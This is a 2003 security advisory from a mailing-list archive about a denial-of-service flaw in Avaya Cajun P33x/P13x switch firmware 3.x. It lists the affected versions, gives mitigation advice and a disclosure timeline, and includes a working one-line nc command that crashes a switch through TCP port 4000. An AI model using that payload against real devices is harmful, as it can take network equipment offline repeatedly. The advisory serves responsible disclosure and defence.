1. Problem Description There exists a denial of service attack in the AVAYA Cajun P33x and P13x switch family with firmware versions 3.x. It is possible to stop the switch for 30 seconds. By repeating the attack access can be denied for arbitrarily long periods of time. 2. Tested systems The following versions were tested and found vulnerable: Avaya Cajun P330T software version 3.12.1 Avaya Cajun P333R software version 3.12.0 Avaya Cajun P133 software version 2.6.1 Other versions are are believed to be vulnerable. Additionally Avaya has found the G700 Media Gateway to be also vulnerable. 3. Details By connecting to tcp port 4000 on the switch and sending at least five bytes, of which the first four represent a negative integer will cause the switch to stall, after some time the switch reboots. Example: sq5bpf@hash:~$ printf "\x80dupa"|nc -v -v -v -n 192.168.66.3 4000 (UNKNOWN) [192.168.66.3] 4000 (?) open [the connections stalls] The time the switch needs to become operational again is about 30 seconds, after this time the attack can be repeated. 4. Recommendations As always it is good administrative practice to block unknown traffic to network devices. Upgrading the switch to version 4.x also seems to fix the problem. 5. Vendor status AVAYA was informed on 3 Jun 2003. The vendor responded on 4 Jun 2003. As the vendor proved responsive and worked promptly on the problem, I have agreed to release the information after 17 Jun 2003. The fixed software is avaliable from the Avaya support site http://support.avaya.com. Official AVAYA security advisories are located at http://support.avaya.com/security/ 6. Disclaimer Neither I nor my employer is responsible for the use or misuse of information in this advisory. The opinions expressed are my own and not of any company. Any use of the information is at the user's own risk. Jacek Lipkowski sq5bpfat_private Andra Co. Ltd. ul Wynalazek 6 02-677 Warsaw, Poland http://www.andra.com.pl
This archive was generated by hypermail 2b30 : Wed Jun 18 2003 - 09:35:15 PDT